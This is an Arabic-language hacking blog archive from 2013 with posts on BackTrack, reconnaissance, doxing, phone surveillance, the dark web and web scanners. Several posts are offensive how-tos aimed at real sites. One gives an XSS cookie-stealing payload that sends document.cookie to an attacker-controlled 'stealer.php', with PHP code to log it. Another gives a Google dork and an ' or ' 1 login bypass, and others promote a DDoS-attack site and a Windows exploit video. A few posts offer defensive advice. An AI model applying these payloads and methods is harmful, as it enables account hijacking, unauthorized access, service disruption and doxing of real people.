الأربعاء، 1 مايو 2013

حل مشكلة تعريف مفتاح الويرلس في الباك تراك

السلام عليكم اليوم جبت لكم حل مشكلة كثيرا ماوقعت معي وهي تعريف الويفي على الباك تراك

كيفية تحميل وتثبيت الباك تراك


تحميل وتثبيت الباك تراك



السلام عليكم بعد طلابات الكثير من الاعضاء حول الباك تراك ودروسه اليوم بدات باول درس هو كيفية تحميل وتثبيت الباك تراك
رابط تحميل الباك تراك   اظغط هنا
تحميل الvmware player اضغط

startx
 

الثلاثاء، 30 أبريل 2013

مقال: تعرف على أولى أدوات مرحلة الاستطلاع: HTTRACK

كما ذكرنا مِن قبل فعملية الاستطلاع هي الأقل تقنية، ولكن مع ذلك فهناك أدوات نستخدمها لتساعدنا في هذه المرحلة ولكن الاعتماد الأكبر لا يكون على الأدوات بالطبع!!
عادةً ما نبدأ خطوتنا الأولى بالتدقيق في الموقع الإلكتروني للهدف. في بعض الأحيان، قد نستخدم أداة أسمها HTTrack لنصنع نسخة مطابقة للموقع. HTTrack أداة مجانية تقوم بصنع نسخة مطابقة للموقع و لكنها تكون موجودة على حاسوبك. هذه النسخة ستحتوي على كل الصفحات الموجودة في الموقع، الروابط، الصور، نسخة مطابقة تمامًا لموقع الهدف.
من المهم أن تعرف أنكَ كلما قضيت وقتًا في التنقل و استعراض الموقع المستهدف، كلما زادت المخاطرة بتتبع أثارك حتى و إن كنت تتصفح الموقع بشكل عادي. تذكر أنكَ في كل مرة تتصل مباشرةً بالهدف، فهناك احتمال أن تترك خلفك أثار يسهل تتبعك من خلالها.
يمكنك تحميل برنامج HTTrack مباشرة من موقعهم الرسمي :http://www.httrack.com/ من أجل تثبيت البرنامج على الويندوز فهو أمر لا يحتاج الكثير من الجهد، فبمجرد تحميل الملف التنفيذي exe و تشغيله سيبدأ التثبيت المعتاد كأي برنامج آخر. إن أردت تثبيت HTTrack على الـ”باك تراك” فيمكنك ذلك عن طريق كتابة الأمر :
apt-get install httrack
الفائدة من هذه الأداة أنها ستمكنك من تصفح نسخة مطابقة من الموقع المستهدف بدون الحاجة إلى الاتصال بالموقع الأساسي، و هذا سيقلل من مخاطرة تركك لآثار قد تؤدي إلى الوصول إليك أثناء تصفحك للموقع الأساسي.
يجب أن نذكر أن ما قمنا بتثبيته الآن هو النسخة التي تعمل عن طريق سطر الأوامر، أما النسخة ذات الواجهة الرسومية فأنا لا أحبذها صراحة، ليس لضعفها ولكني أفضل النسخة التي تعمل عن طريق سطر الأوامر.
لتشغيل الأداة يكفي أن تكتب في سطر الأوامر:
 1
بمجرد كتابتك لهذا الأمر، سيبدأ عمل الأداة  كما في الصورة:
 2
فلنشرح الأوامر الظاهرة في الصورة:
mkdir websites: لصنع مجلد جديد اسمه websites ليحتوي على ملفات الموقع المراد نسخه.
cd websites: للدخول إلى هذا المجلد.
httrack: لاستدعاء الأداة أو لتشغيل الأداة.
Enter Project Name: يسألنا عن اسم للعملية وقد استخدمنا اسم isecur1ty.
Base path: هذا هو المسار الذي سيتم حفظ ملفات الموقع الذي سنقوم بنسخه.
Enter URLs: رابط الموقع المراد صنع نسخة مطابقة منه.
Action: خيارات صنع النسخة، أنا أفضل الخيار الثاني، فهو يعطيك خيارات إضافة كالتالي:
1-  Proxy: يسألك إن كنت تريد استخدام proxy أثناء الاتصال.
2-  You can define wildcards: يسألك إن كنت تريد تحديد نوع محدد من الملفات لتحميله.
3-  Additional options: يسألك عن خيارات إضافية، يمكنك التوصل إليها عن طريق كتابة help في هذه الخانة.
بالطبع الوقت الذي سيستغرقه تحميل الموقع يعتمد بشكل كامل على حجم الموقع المستهدف، بعد أن تنتهي الأداة من تحميل الموقع، ستحولك إلى صفحة يمكنك من خلالها تصفح الموقع المطابق وستتمكن من التجول فيه بكل سهولة، و يمكنك أن تدخل لهذه الصفحة أيضًا من خلال الانتقال للمكان الذي قمت بحفظ الموقع فيه.
 3
سواء قمت بصنع نسخة مطابقة للموقع على حاسوبك أو كنت ستتصفح الموقع بشكل طبيعي على الإنترنت فيجب أن تنتبه إلى التفاصيل. يجب أن تبدأ بتسجيل كل المعلومات التي تجدها على موقع الهدف. عادةً، ببعض البحث العميق ستصل إلى معلومات مهمة ستفيدك كثيرًا، الإيميلات الخاصة بالموقع أو الإيميلات الخاصة بصاحب الموقع، عنوان الشركة، رقم الهاتف، رقم الفاكس، الكثير من المعلومات.
خلال هذه العملية يجب أن تنتبه للتصريحات والتحديثات التي تعلنها الشركة من خلال موقعهم، فمثلًا: إن كانوا قد اعلنوا عن دمج شركتهم مع شركة أخرى فهذه يعطيك قائمة بأهداف محتملة قد توصلك إلى النظام الرئيسي، يجب أيضًا أن تنتبه إلى طلبات الوظائف التي تعلن عنها الشركة، فعندما تطلب شركة ما قدرات معينة في الشخص الذي تريده سيمكنك هذا من معرفة التكنولوجيا المستخدمة في الشركة، مثلًا: إن طلبت الشركة شخص يستطيع العمل على نظام لينكس و ويندوز، فهذا يعني أنهم يستخدمون هذه الأنظمة في شركتهم، كل هذه المعلومات مهمة. وهناك أمثلة حية على ذلك ففي كثير من الأحيان تجد المواقع والمنتديات تنشر تحديثاتها التقنية، مثلاً تجد موقع يُعلِن عن تحديثه لنسخة اسكربت الصور، أو مثلاً تحديث نسخة المنتدى إلى النسخة كذا!! هل يمكنك تخيُل مقدار المعلومات التي يمكنك الحصول عليها بدون أي جهد!!
عادةً، عندما ننتهي من هذه العملية، ستكون لدينا معلومات عن مَنْ هم، و ماذا يفعلون، و أين عنوان شركتهم الفعلي؟
عندما ننتهي من هذه العملية ستكون لدينا فكرة عن طبيعة الشركة و عملها، و يمكننا الآن أن ننتقل إلى عملية الاستطلاع السلبي. عندما تبدأ عملية الاستطلاع السلبي فمن المستحيل أن تتمكن الشركة من تحديد تحركاتنا وذلك لأن هذه العملية لا تتطلب إرسال حزمة واحدة إلى الهدف. سلاحنا الأساسي لأداء هذه المهمة هو الإنترنت. يجب أن نبدأ هذه العملية بعمل بحث كثيف عن الهدف في عدة محركات بحث.
يوجد العديد من محركات البحث في وقتنا الحالي، و أهمهم و أشهرهم جوجل بالطبع، لا يوجد أحد في العالم لا يعرف جوجل.
ما أخبرنا به Johnny Long في كتابه “Google Hacking For Penetration Tester” قد غير عالم اختبار الاختراق تمامًا. عادةً، عندما تسأل شخص ما عن كيف تستخدم جوجل فجوابه يكون ثابت “قم بفتح المتصفح، ثم اكتب جوجل، ثم ابحث عن أي شيء تريده”، لكن ما ورد في كتاب Johnny Long قد غير طريقة تفكيرنا تمامًا.

الاثنين، 29 أبريل 2013

إخترق إي جهاز في العالم و غير باسورد Admin

إخترق إي جهاز في العالم و غير باسورد Admin


بسم الله الرحمان الرحيم

إخواني أعضاء و مشرفي منضمة الهكر العربي


إليكم أسطوانة Windows Admin Hack



فهي أسطوانة تساوي الملايين لكسر باسوورد أي جهاز في العالم
حجم الأسطوانة فقط4Mo بعد فك الضغط

الأسطوانة عبارة عن ملف ISO يجب حرقها علي CD قبل إستعمالها




التحميل
http://pogostick.net/~pnh/ntpasswd/cd100627.zip

هيـــه؟ حمل و اهرب؟ على الأقل رد واحد

___________________________________________________
Anonymous arabe

السبت، 27 أبريل 2013

كيف تصبح هاكر محترف

 كيف تصبح هاكر محترف  انا اضمن لك احتراف الهاكر يعني هاذا هوالباب الاول الذي دخلت منه الى الهاكر

كورس CEH v7 الهاكر الاخلاقي







السلام عليكم ورحمة الله وبركاته ................."قرصان أبيض القبعة" هو المصطلح الاوضح و يطلق على المخترق الذي يملك جميع المعلومات والدراسات التي تجعله هكر أخلاقي.



يساعد الشركات في استعادة مواقعها ودراسة كيفية تمكن المخترق " قبعة سوداء " من السيطرة على السيرفر وبذلك يقوم فوراً بتوفير الحماية اللازمة من تلك الطرق والأساليب والثغرات المستخدمة من قبلهم .


يبدأ المهندس مؤمن هانى في شرح كورس CEH الذي يؤهلك للحصول علي شهادة CEH version6 &7 يمكنكم متابعة الشرح
1-CEH Introduction

2-Introducation to Ethical Hacker
3- Footprinting 4-Scanning Networks 5-DNS Spoofing 6-Phishing 7-Trojon & Backdoors 8-Viruses and Worms 9-Encryption 10-Certified Ethical Hacker - CEH (DDOS Attack) By Eng-Momen Hany 11-Certified Ethical Hacker - CEH (System Hacking) By Eng-Momen Hany 12-Certified Ethical Hacker - CEH (Hacking Wireless) By Eng-Momen Hany

نصائح لحماية حاسوبك من الاختراق

حاسوبك هو ملكيتك المعلوماتية التي تتضمن كل ما يخصك من صور و من معلومات و اسرار لكن هل فكرت يوما انه التجسس عليك ممكن نعم يمكن لاي شخص التجسس على ملكيتك و تخريبها و سرق محتوايتها لهذا في هذه التدوينة قررت ان اعطيك نصائح من اجل الحفاظ على حاسوبك و حمايته من الاختراق .
تحميل برامج مضادة الفيروسات : فهذه البرامج تلعب دورا هاما في جهازك في حمايته و ذلك بكشف الفيروسات و تحذفها من الجهاز و و هي برامج ضرورية للحفاظ على جهازك من الاختراق 
تجنب الروابط الملغمة : فبعض الاشخاص يقومون بارسال روابط ملغمة  الينا على اساس التجسس و سرقة المفات و حسابتنا الشخصية على الانترنيت 
تجنب الملفات ذات الامتددات المتعددة مثل:filename.bmp.***) أو (filename.txt.vbs). فهذه الملفات مملوءة بالتروجونات

اغلق كل البورتات المفتوحة في جهازك : فاذا وجد بورت مفتوح في جهازك فاعلم انه سيتم التجسس عليك من قبل الهاكر 



الجمعة، 26 أبريل 2013

مقال: ماهو Doxing وكيف تجنبه

مقال: ماهو Doxing وكيف تجنبه

موضوعنا اليوم سيكون حول مفهوم Doxing سنقوم بمعرفة معناه والتقتنيات والأدوات المستعملة به وأيضا كيف نقوم بالحماية منه.Detective_cut_out_clip
جلنا يعلم أن لكل شخص عدو أو ربما أعداء سواء كان هدا الشخص مشهورا عالميا أو تصفية حساب أو كان الشخص مجرد  مستهدف من قبل هاكر غير أخلاقي إدا يقوم المهاجم بجمع معلومات للكشف عن ضحيته والوصول إلى هدفه من هنا جاء مفهوم Doxing خصوصا عند الهاكر فهدا العالم يستوجب على الهاكر إخفاء نفسه ولا يترك أي أثر يكشف عن هويته مثلا نجد مشاكل بين هاكر وأخر ويقوم أحد منهم يكشف عن هوية الشخص فأنت بعالم الأنترنت تتعرف على الشخص فقط من الإسم المستعار الدي يطلق على نفسه وتتعامل معه من خلال الأنترنت ومن خلال إسمه المستعار فحين الكشف عليه ووضع كل مايخصه للناس يصبح هدا الشخص مستهدفا من قبل شرطة الأنترنت وهنا نتحدث فقط عن الهاكر الدين يقومون بعمليات إختراق الغير أخلاقية ليس مثل أطفال الهاكر من يجدون ثغرات جاهزة ويستخدمونها .
بطبيعة الحال يمكن إستخدام Dowing في إختبار إختراق أخلاقي والإستفادة منه وكدلك يستخدم في عمل تخريبي حيث أن رئيس أمريكا أوباما قد تم إستهدافه ب Doxing ومعرفة المواقع التي يزورها ومعرفة اسم الحساب الشخصي الخاص به وكذلك معرفة رقم الهاتف الشخصي الخاص به وهذا يثبت لنا فقط بأن Doxing يبقى أمرا خطيرا لدرجة كبيرة ويصعب الحماية منه.
تبقى طريقة توفرك على المعلومات الشخصية لهدفك مختلفة عند كل شخص فهنالك من سيقوم باستخدام محركات البحث مثلا ك Bing & Google & Yahoo الشهيرة والمعرفة وكذلك هناك من سيقوم بإستخدام برامج مثل Maltego وهنالك أيضا مواقع تساعدك بهذه العملية حسب بلد الشخص المستهدف وهذه المواقع تسمى الصفحات الصفراء تقوم “Yellow page” حيث تقوم بكتابة إسم الضحية يعطيك العنوان ورقم الهاتف والعكس صحيح وتبقى هذه لمواقع خطيرة جدا حيث تكشف عن معلومات جد حساسة كذلك مثلا هدفك يتواجد ببلد غير بلدك لنقل مثلا بالمغرب فأنت ستقوم بالدخول إلى  موقع Yellow page الخاص بالهدف وتقوم بكتابة إسمه أو رقم هاتفه أو تقوم وتجد النتيجة أمامك .
هنالك أيضا طرق كثيرة تستخدم في Doxing فعند إمتلاكك لبريده الشخصي تقوم بمراسلته برسالة وعند رده عليك ستقوم بمعرفة IP الخاص به وهذا الأخير سيمكنك من معرفة مزود الخدمة الخاص به مكان إقامته ويمكنك أيضا أخد صور لمكان إقامته وإستفزازه بها وطلب المقابل لذلك لو كان هناك حساب ما “لا أشجع على تطبيق هده الطريقة”.
إذا هدا مايسمى Doxing تتبع أثار الأشخاص والتوفر على معلوماتهم الحساسة يبقى أمرا جد خطير فالنصيحة تكمن في عدم كتابة أي معلومات قد تنفع غيرك بإستخدامها ضدك خصوصا بالمواقع الإجتماعية تجنب عدم قبول صداقات أشخاص لا تعرفهم أو إعطاء معلومات لأي شخص مهما كان إستخدم برامج التشفير برسائلك وتجنب التسجيل بالمواقع المشبوهة والتي تقوم ببيع قاعدات البيانات الخاصة بها مقابل مبلغ مادي وهدا سيؤدي إلى معرفة الأرقام السرية للمسجلين بالموقع إذا يبقى الأمر عليك في طريقة إستخدامك ل موضوع Doxing أتمنى عدم تجربته على الأشخاص بطرق غير قانونية فنحن لا نشجع على دلك.

الاثنين، 22 أبريل 2013

اختراق المواقع بثغرة XSS

اختراق المواقع بثغرة XSS

ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع ؟
 ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال كود javascript أو HTML او PHP
 ما يجب ان تعرفه HTML,javascript,PHP

 اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع.....
 و معظم هذه الثغرات موجودة في مربعات البحث في المواقع ...
 مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.
www.facebook.com/search.php?q=word
 يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".
 و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟
http://www.facebook.com/search.php?q=<script>alert("XSS")</script>word
 ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "
 هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS
 هذا يعني ان الموقع مصاب بثغرة XSS
لماذا يكون الموقع مصابا بها ؟
 لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل #@$%^,.<>
 ليمنعو من إدخال كود javascript او HTML
هناك نوعين من ثغرات الXSS
 

النوع الدائم :
 يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
 حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .
 <script>alert("XSS")</script>
 و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
 

النوع المؤقت :
 يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟
 

هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS
 أهمها سرقة الكوكيز
 تحتاج الى استضافة موقع تدعم PHP
 ننشئ صفحة PHP مثال stealer.php
 تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET
 الكود :
 <?php
 $data=$_GET["c"]
 $f=open("cookies.tct","w")
 $f.write($data)
 $f.close()
 ?>
 

هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
 هنا دمجنا السكريبت
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو الكوكيز عن طريق الأمر
 document.cookie
 هنا اذا فتحنا الملف
http://yoursite.com/cookies.txt
 ستجد الككيز للمستخدم مكتوبة فيها
 

 اما في الثغرات الدائمة فيكفي ادخال الكود
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 ليسرق الكوكيز
 

و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS
  عن طريق سكريبت

كيفية إختراق المواقع المصابة بثغرة bypass

كيفية إختراق المواقع المصابة بثغرة bypass



كيفية إختراق المواقع المصابة بثغرة bypass

اولا ضع هذا "الدورك" (admin/login.asp) في محرك البحث google ثم نضغط entre

سوف تظهر لنا الكثير من المواقع المصابة بهذه الثغرة

نختار منها موقع ونفتحه فتظهر لنا لوحة التحكم لادمين الموقع وبها خانتان

الخانة الاولى نضع بها اسم المستحدم حيث نكتب كلمة admin

الخانة الثانية نضع بها كلمة المرور حيث نكتب هذا الكود ' or ' 1

شاهد الفديو  

تحميل نظامanonymous os

تحميل نظامanonymous os

 ساشرح اليوم طريقة تحميل نظامanonymous os الخاص بمجموعة المجهولين (Anonymous) التي قامت بإطلاق توزيعة لينكس خاصة بهم تحمل إسم Anonymous OS وهي في الأصل نسخة معدلة من لينكس 11.10 تستخدم بيئة Mate لسطح المكتب وتحتوي على العديد من الأدوات التس تساعدك على إختبار المواقع وأمنها وأصحاب التوزيعة يقولون أن الغرض من هذه النسخة تعليمي بحت وهم لايشجعون على إختراق المواقع ويحملون المستخدم نفسه مسؤولية أي شيء يحدث عن إستخدام هذه التوزيعة.

عند التحميل انصح ب اسخدامه على نظام و همي لتجنب اي مشاكل  ( VMware Workstation )
رابط التحميل     thepiratebay

الاثنين، 15 أبريل 2013

تعلم التشفير بكل انواعه

http://www.youtube.com/user/woOokr هاذا قنات احد اصدقائي بها كل مايخص عالم التشفير

الخميس، 11 أبريل 2013

الاثنين، 8 أبريل 2013

اقوى دورة اختراق الاجهزة

اهلا بكل متتبعينا على الفايسبوك اليوم اول درس لدورة احتراف اختراق الاجهزة
اترككم مع مسر كريزي
لــتــفــاصــيــل الــتــحــمــيــل اضــغــطـ ((( هـــــنـــــا ))) ----------------------------------------­----------------------------------------­-------------- دورة مستر كريزي لاحتراف اختراق الاجهزة والتشفير والحماية لـ المبتدئين شاملة لـ جميع البرامج والأدوات والروابط المستخدمة - من الصفر إلى الاحتراف cr3zy mr.cr3zy crazy mr.crazy crezy mr.crezy ----------------------------------------­----------------------------------------­-------------- الطريقة الأولى لـ التحميل : من خلال موقع الـ ميديا فاير - اضغط على هـ الرابط http://www.mediafire.com/?byl7350aoem0v 1 - اختر طريقة التحميل التي تناسبك - أحادية أو خماسية 2 - اضغط على كلمة Download المجاورة لـ البارت الذي تريد تحميله 3 - انتظر لحظات حتى يتم تنشيط الرابط 4 - اضغط على كلمة Click Here To Start Download ----------------------------------------­----------------------------------------­-------------- الطريقة الثانية لـ التحميل : من خلال موقع الـ فور شيرد - اضغط على هـ الرابط http://mrcr3zy.4shared.com 1 - اختر طريقة التحميل التي تناسبك - أحادية أو خماسية 2 - اضغط على سهم التحميل الأخضر المجاور لـ البارت الذي تريد تحميله 3 - اضغط على كلمة Download Now 4 - انتظر العد التنازلي 5 - اضغط على كلمة Download File Now

الخميس، 4 أبريل 2013

مقال : الهاتف النقال حمايته ومراقبته

مما لا شك فيه فإن كل جهاز إلكتروني متصل بالشبكة فهو مراقب من جهات مختصة كذلك الأمر ينطبق على هاتفك النقال فكم من شخص تسبب له هذا الهاتف بالسجن أو بتسريب معلومات خطيرة أفادت بشكل كبير الطرف الأخر وأصبح الهاتف النقال في حياتنا اليومية شبه مستلزم عند كل فئات الناس من صغرهم إلى كبرهم هذا ماجعله يصبح أداة للتنصت على مكالماتنا أو حتى رسائلنا والإطلاع على الرسائل المخزنة وكذلك الوصول إلى كافة المعلومات المخزنة به في هذه التدوينة سوف نتطرق إلى كيف يتم إختراق الهاتف النقال وكيف يتم الحصول على المعلومات وماهي الطرق التي يتوجب علينا عملها لتجنب وقوعنا بالمشاكل.؟
مما لا يخفى علينا فإن جهاز الهاتف يكون مراقب من حيث المكالمات التي تصله أو المكالمات التي يعملها وكذلك الرسائل المرسلة والواردة فكل هذه الأشياء يتم تخزينها من طرف شركات الإتصالات أو الإستخبارات كذلك عندما يكون الشخص مستهدف وسوف نتطرق إلى كيفية حدوث ذلك ببقية الموضوع.
sdfs
كلنا يعرف بأن الهاتف يكون مرتبط بشبكة يمر من خلال خطوط شركة الإتصالات وهاته الشركة قد تكون خاضعة لجهات كبيرة أو قد يكون هنالك صفقة سرية فيما بينهم بحيث تقوم بإعطاء التسجيلات لهاته الجهة ويتم حفظها لمدة لاتقل عن 6 أشهر وبعدها يتم حذف جميع البيانات من الشركة وهذا مايشكل خطرا على المستخدم فعندما يتم تسجيل أي شيء يخص بهاتفك فإنه قد يستخدم ضدك عند الحاجة إليه وقد يخضعك إلى عقوبات في حقك وقد تكون قاسية .
كيف تتم عملية المراقبة؟
تتم عملية المراقبة لأجهزة الهاتف الأرضية أو المحمولة بطريقة عادية حيث يتم ذلك عن طريق شركات الإتصال أو عبر الجهات الحكومية والإستخبارات وقد يتم التنصت عليك دون الحاجة منهم إلى أي أدات أو جهد كبير وكما حدث في الثورة المصرية فعندما يقع أحد يقبضة أجهزة الأمن يكون سهلا بأيديهم أن يتنصتو عليه ومعرفة رسائله كيف ذلك ؟
تعرض المتظاهرون في ثورة مصر للإعتقال سواء كان بسبب أو من غير وبعد إلقاء القبض عليهم يكونو كطعم لأجهزة المخابرات حيث يتم إستخدام أو زرع شريحة صغيرة إسمها Proxy Sim card لشريحة الهاتف بحيث يتم زرعها من خلال جهاز معين هذه الشريحة التي يتم زرعها تسمح لهم بنسخ جميع البيانات التي يتم تسجيلها بداخل الشريحة الرئيسية للجوال من سجلات الأسماء والإتصالات والرسائل , عندما يتم القبض على الشخص يتم أخد كل مابحوزته من جوال و أوراق إلخ ويتم بغرفة ثانية التلاعب بشريحة الهاتف بدون علم منه فيقومون بزرع تلك الشريحة كما قلنا وعند إطلاق سراحه الشخص لا يدري بأنه أصبح طعما ومستهدفا فعند خروجه من مكتب التحقيق يقوم بعمل إتصالات وإرسال رسائل لأشخاص غيره فيقوم هو من دون شعور منه بمساعدة المخابرات الأمنية بالقبض على كل من معه هكذا تم القبض على العديد منهم وإستجوابهم في الثورة المصرية
كما أن المسؤولون بشركة الإتصالات بدولة عربية لاداعي لذكر إسمها تعرض مسؤولوها لإختراق والتجسس عليهم وكانت هذه العملية جد خطيرة فقد قام الكيان الصهيوني بالتنصت على شخصيات كبيرة بهذه الشركة وكان من ضمنهم مهدنسين ومسئولين : رئيس مجلس الإدارة – ومدير إدارة تصميم الشبكات وغيرهم الكثير والكثير من المناصب الحساسة فقد قام الكيان الصهيوني بإرسال طعهم وهما شخصان لهذه الشركة وقاما بزرع أجهزة المناسبة لخدمة الكيان الصهيونو داخل شبكة الشركة المستهدفة ولاداعي للدخول في التفاصيل .
طرق الحماية ؟
  1.      لحمايتنا من المتاعب والمشاكل يجب علينا معرفة بأن حمايتك الشخصية من المتاعب تكمن من خلالك أي بمعنى
  2.      الإبتعاد قدر الإمكان عن المشاكل التي قد تجعلك محل مراقبة لجهات معينة سواء حكومية وأمنية
  3. ولو قدر الله ووقعت بالمشاكل يجب عليك معرفة شيء أحسن شيء تقوم به بعد إطلاق سراحك وهو تغير شريحتك وهاتفك والبدأ من جديد فقد تكون طعما كما قلنا
  4. ضبط السان والكلمات عند إستخدامك للهاتف الأرضي أو المحمول بحيث تتكلم بطريقة يفهما الشخص الذي تكلمه قد تكون برموز أو ماشابه
  5.     وطرق الحماية كما قلت تبقى عليك أيها المستخدم والحيطة والحذر من الواجبات الأساسية عليك
الهواتف الأرضية أو المحمولة يمكن أن تكون بمتابة الوسيلة التي تسهل علينا أمورنا اليومية ومن بين أكثر الوسائل إستخداما في حياتنا الشخصية فقد تكون عدد المكالمات والرسائل في اليوم بنسبة لاتتخيل أي بملايير الارقام في العالم هذا ماجعلها مستهدفة عند البعض فالحيطة والحذر هي من أولى السمات التي يجب علينا معرفتها .

الخميس، 28 مارس 2013

افضل واول موقع يشن هجمات ddos attack

لقد انتهيت اليوم من تصميم سكربت هجمات ddos له عدت مزايا منها السرعة لانه على استضافة ولا يستهلك موارد الجهاز لن اطيل عليكم اترككم مع التجربة
 الموقع  اضغط هنا

السبت، 23 مارس 2013

فيديو دورة اختراق المواقع الدرس الاول

شرح يتحدث عن كيفية إستخدام exploit  في إختراق windows 2003.  شرح يتحدث عن إستخدام  exploit في إختراق windows server 2003 من خلال ثغره ms08_067_netapi من خلال كود exploit  والحصول على windows command shell بكل سهوله


http://www.2shared.com/document/U19Nd_AW/hack_win_2003.html

فيديو:هجمات حجب الخدمة “DDOS ATTACK” و كيف يتم تنفيذها

هاذا اول فيديو اشرح فيه اهم ادوات الدوس التي ذكرت في الدرس السابق

مقال: ماهي هجمات حجب الخدمة “DDOS ATTACK” و كيف يتم تنفيذها

لن اطيل عليكم اسف هناك مشكل في الصوت الدرس القادم سيكون افضل

http://www.2shared.com/file/SNMDBzyw/Dos-Tools.html

الجمعة، 22 مارس 2013

مقال :الإنترنت الخفي والإنترنت المظلم

deepwebالإنترنت المخفي والأنترنت المظلم أحد أسرار الشبكة العنكبوتية ,إذ أن شبكة الأنترنت العادية التي نعرفها لاتشكل إلا القليل من حي معرفتنا به فمثلا جبل الجليد نجد نصفه الأعلى مكشوف للعموم أما نصفه المخفي فلا أحد يعلم ماهو عمقه الحقيقي هذا ماينطبق على الأنترنت المخفي والمظلم وماخفي كان أعظم إذا مانعرفه نحن بالأنترنت يشكل فقط سطح جبل الجليد الظاهر أمامنا وماخفي منه تحت الماء هو مانقصد به الأنترنت المخفي والمضلم فهذا النوع من الشبكات والحواسيب مرتبطة بينها فيما لايمكنك تصفحها بشكل عادي ولا يمكنك الوصول إليها إلا بشروط معينة وتحتاج لهذه العملية برامج سوف نشرحها في بقية شرحنا .
يعتبر الأنترنت الخفي والمظلم صعبت التجسس من قبل الحكومات وتعقبها حيث أن أكبر مجموعات الهاكر يقومون بإستخدام هذه الطرق للتخفي وعقد إجتماعاتهم لشن الهجومات على أهدافهم وقد نجد كذلك من بين هذه المواقع والشبكات تستخدم في أمور غير قانونية كترويج الأسلحة أو المواد الممنوعة أو حتى الأعضاء البشرية.
Darknet  & Deepweb هو عالم أنترنت خفي وسري للغاية ولا يمكننا الوصول إليه أو حتى تصفحه بالمتحصفحات العادية المتطورة وحتى مع تقدم التقنيات بجوجل إلا أن أشرفت مواقعه يبقى أمرا غير ممكن أجل فالديب ويب لا يمكن البحث عن مواقعه داخل جوجل ولن تجد لها أي أثر
الفائدة منه ؟
يعتبر   Darknet  & Deepweb كما قلنا مساحة خاصة لعالم الجريمة بكل مافيه سواء كانت جريمة أو سوق سوداء أو تبادل صور أو بيع الأسلحة أو عمل دورات تدريب للهاكر خاصة من طرف المجموعات الشهيرة والكبرى التي تكون مستهدفة من طرف السلطات بحيث نجد Anonymous لها شبكة كبيرة جدا في Deepweb لتعليم أساليب الإختراق وكذلك طرح الأدوات والوسائل البرمجية التي تخصهم وبيع الثغرات والحسبات المصرفية أو ماشابه .

كما يعلم الجميع عندما نريد الدخول لموقع عادي على شبكة الأنترنت نقوم بكتابة مثلا :
www.secur1ty.tk
يقوم المتصفح Google Chrome & Firefox بتوجيهنا مباشرة للموقع وتصفحه بصورة عادية أما عندما نريد الدخول إلى بعض المواقع داخل الشبكة الخفية لا يمكن ذلك وحتى أسامي المواقع نجدها غريبة مثال على ذلك :
kpvz7ki2v5agwt35.onion/wiki 
كما نلاحظ فدخولنا من المتصفح العادي لا يمكن ذلك ويبقى أمر شبه مستحيل ولو قمنا بالبحث عن الموقع داخل Google لن نجد له أي أتر ولا يمكن ذلك ولكي نقوم بالولوج إلى هذه المواقع وتصفحها يجب توفرنا على برنامج Tor ويبقى هذا الأمر شيء ضروري لكي نتصفح المواقع
كما يمكن للجميع أن يقومو بتجربة إنشاء موقع على شبكة Deepweb ولكن الأمر للتجربة فقط وليس بعمل شيء غير أخلاقي فكما قلنا إستعمال هذا النوع من الأنترنت يكون أكثر في أعمال تخريبية إذا لزيارة الموقع لكي نعمل من خلاله نطاق .onion يرجى زيارة الرابط في أسفل الموضوع.

مقال : Arachni منصة إكتشاف ثغرات الويب


logo
Arachni هو برنامج رائع من خلاله تقوم بإختبار إختراق تطبيقات الويب , يعطيك منصة سهلة الإستعمال وبنتائج جد رائعة, تمت برمجته بلغة ruby حيث يقوم هذا البرنامج بعملية مسح كامل لتطبيقات الويب وإكتشاف ثغراتها وعمل إختبار إختراق لها , كما يأتي البرنامج بواجهة رسومية تعمل من خلال المتصفح يسهل العملية بشكل سلس ويوجد كذلك طريقة التشغيل عن سطر الأوامر للمتقدمين .
 معلومات عن Arachni :
المعلومات بشكل عام :
  • Cookie-jar/cookie-string support.
  • Custom header support.
  • SSL support.
  • User Agent spoofing.
  • Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.
  • Proxy authentication.
  • Site authentication (Automated form-based, Cookie-Jar, Basic-Digest, NTLM and others)
  • Automatic log-out detection and re-login.
  • Custom 404 page detection.
  • Highlighted command line output.
  • UI abstraction:
    • Command line UI
    • Web UI (Utilizing the Client – Dispatcher RPC infrastructure)
  • Pause/resume functionality.
  • High performance asynchronous HTTP requests.
  • Open RPC Client/Dispatcher Infrastructure
    • Distributed deployment
    • Multiple clients
    • Parallel scans
    • SSL encryption (with peer authentication)
    • Remote monitoring
    • Support for High Performance Grid configuration, combining the resources of multiple nodes to perform fast scans.
محلل HTML :
  • Forms
  • Links
  • Cookies
  • Headers
ثغرات الموقع :
  • Filters for redundant pages like galleries, catalogs, etc based on regular expressions and counters.
  • URL exclusion filter based on regular expressions.
